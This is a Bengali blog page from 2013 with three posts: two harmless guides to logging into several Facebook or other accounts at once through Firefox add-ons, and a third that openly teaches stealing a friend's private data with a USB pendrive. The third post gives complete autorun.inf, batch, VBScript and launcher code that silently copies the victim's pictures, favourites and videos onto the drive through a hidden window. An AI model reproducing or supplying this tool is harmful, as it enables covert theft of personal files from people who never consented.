Sunday, April 21, 2013

একইসাথে একাধিক ফেসবুক আইডিতে লগইন করুন

আপনার কি একাধিক ফেসবুক আইডি আছে? আমাদের প্রায় সবারই একাধিক ফেসবুক আইডি আছে। আমি অনেক লোককে দেখেছি একাধিক ইয়াহু, জি-মেইল এবং ফেসবুক আইডি ব্যবহার করে। আমার নিজেরও একাধিক ফেসবুক বা ইয়াহু আইডি রয়েছে। এখন জিজ্ঞেস করতে পারেন কেন এই একাধিক আইডি ব্যবহার করা? আমি যদি বলি তবে বলব আমার প্রাইভেসির জন্য। আমি একটি একাউন্ট রাখি ব্যক্তিগত ব্যবহারের জন্য এবং অন্য একটি একাউন্ট রাখি সাধারণভাবে ব্যবহারের জন্য। এখন কথা হল কিভাবে আমরা একই সাথে একাধিক ফেসবুক আইডিতে লগইন করব। আর এটার সমাধান নিয়ে আমি আমার আজকের এই টিউনটি করেছি।

প্রথমে Firefox যদি না থাকে তাহলে এটি ডাউনলোড করে ইনস্টল করুন।
এখানে ক্লীক করুন এবং CookiePie Firefox addonটি ইনস্টল করুন। এখন আপনার ব্রাউজারটি রিস্টার্ট করুন।

এখন ব্রাউজারটি খুলুন এবং  আপনার ফেসবুক একাউন্টে লগইন করুন। তারপর নতুন একটি টেব খুলতে Ctrl + T চাপুন। নতুন খোলা এই টেবের উপর রাইট ক্লীক করে এবং Toggle On/Off Cookiepie সিলেক্ট করুন। এখন টেবের উপর আপনি একটি Cookie দেখতে পাবেন। এবার একটি নতুন ফেসবুক আইডিতে লগইন করুন।
বি:দ্র: এই পদ্ধতিটি আপনি ফেসবুক ছাড়াও ইয়াহু, মাইস্পেস, জি-মেইল, অরকুট ইত্যাদি জায়গায় প্রয়োগ করতে পারবেন।

মোজিলা ফায়ারফক্সে একই সময়ে বিভিন্ন আইডিতে লগইন করুন

আপনার একের অধিক ফেসবুক একাউন্ট রয়েছে? কিংবা টুইটার একাউন্ট? কিংবা কোন ব্লগ/ফোরাম একাউন্ট?
যদি এমন হয় যে আপনি একসাথে একই ব্রাউজারের সাহায‌্যে অনেকগুলো আইডিতে লগইন করতে পারছেন তবে কেমন হয়?
আজ আমি আপনাদেরকে শিখাবো কীভাবে আপনি একই ব্রাউজার থেকে একই সময়ে একই নেটওয়ার্কের বিভিন্ন আইডিতে লগইন করবেন, হোক তা ফেসবুকে কিংবা টুইটারে কিংবা অন্য কোন ফোরামে।
আপনাদেরকে আমি আজ তাই শিখাচ্ছি।
তার জন্য আপনাকে মোজিলা ফায়ারফক্সে একটি এডঅনস ইন্সটল করতে হবে।
এই এডঅনসটির নাম Mltifox , যার নির্দিষ্ট ভার্শনটি আপনার নির্দিষ্ট মোজিলা ফায়ারফক্স ভার্শনে ইন্সটল করার মাধ্যমে আপনি মাল্টি-একাউন্টে লগইন করতে পারবেন।
আগে আপনার মোজিলা ফায়ারফক্সের ভার্শনটি সম্পর্কে নিশ্চিত হয়ে নিন। আপনার ব্রাউজারের মেন্যু থেকে Help এর আওতায় About Firefox এ ক্লিক করে আপনি আপনার ভার্শন সম্পর্কে জানতে পারবেন যে এটি কততম ভার্শন।
তারপর এখানে ক্লিক করে আপনার ভার্শনের সাথে সামঞ্জস্যপূর্ণ এডঅনসটি ইন্সটল করে নিন।
ইন্সটল হয়ে গেলে আপনার ব্রাউজার রি-স্টোর করার নোটিশ আসবে। আপনার ব্রাউজারটি রি-স্টোর করে নিন।
ব্যাস, হয়ে গেল।
ভাবছেন এবার কীভাবে ব্যাবহার করবেন?
তাও বলছি।
আপনার ব্রাউজারের File মেন্যুতে ক্লিক করার পর New Identity Profile অপশন পাবেন। সেখানে ক্লিক করার পর আপনি নতুন ওয়ইন্ডো পাবেন। এবার নতুন উইন্ডোতে নতুন করে আপনার অন্য সব আইডিতে লগইন করে ব্যাবহার করতে পারবে।
এইভাবে আপনি একসাথে অনেকগুলো আইডিতে লগইন করে একই সময়ে একসাথে চালাতে পারবেন।

পেনড্রাইভ প্রবেশ করে হাতিয়ে নিন বন্ধুর পিসির সকল গোপন তথ্য ।

পেনড্রাইভ প্রবেশ করে হাতিয়ে নিন বন্ধুর  পিসির সকল  গোপন তথ্য । আজ আপনাদের
দেখাবো কি ভাবে
অন্য পিসির সকল
গোপন তথ্য
হাতিয়ে নেয়া যায়
। শুধুমাত্র পেনড্রাইভ
ব্যাবহার করে ।
কথা বাড়াবো না
কাজ শুরু করা যাক ।
প্রথমে নোটপ্যাড
ওপেন করুন এবার নিচের
কোডটি কপি করে
নোটপ্যাডে পেস্ট
করুন ।
[autorun]
icon=drive.ico open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
এটি কে autorun.inf
নামে সেভ করুন ।
১টি ফাইল হলো । আবার নোটপ্যাড
ওপেন করে নিচের
কোডটা কপি করে
পেস্ট করো ।
@echo off
:: variables /min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /
e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE% \pictures""%drive%\Data\My
pics"
%backupcmd% "%USERPROFILE%
\Favorites" "%drive%\Data
\Favorites"
%backupcmd% "%USERPROFILE% \videos""%drive%\Data\vids"
@echo off
cls
এটাকে File.bat
নামে সেভ করো ।
২টা ফাইল হলো । আবার নোটপ্যাড
ওপেন করো ।
নিচের কোড
কপি করে পেস্ট
করো ।
CreateObject("Wscript.Shell"). Run """" & WScript.Arguments(0)
& """",0, False
এটিকে Invisible.vbs
নামে সেভ করো ।
৩টা ফাইল হলো ।
আবার নোটপ্যাড ওপেন করো আর
নিচের
কোডটা কপি করে
পেস্ট করতে হবে ।
wscript.exe \invisible.vbs file.bat
এটাকে Launch.bat নামে সেভ করুন ।
৪টা ফাইল হলো ।
এবার পেনড্রাইভ
প্রবেশ
করে তাতে Data
নামে একটা ফোল্ডার
করতে হবে ও তার
ভিতর উক্ত
৪টি ফাইল
নিতে হবে ।
তোমার কাজ শেষ । এবার যে কোন
কম্পিউটারে
পেন্ড্রাইভ
ঢুকিয়ে বের
করো আর সকল তথ্য
পেয়ে যাও । তো এই
বান্দাকে বিদায়
জানাও ।
হ্যাপি হ্যাকিং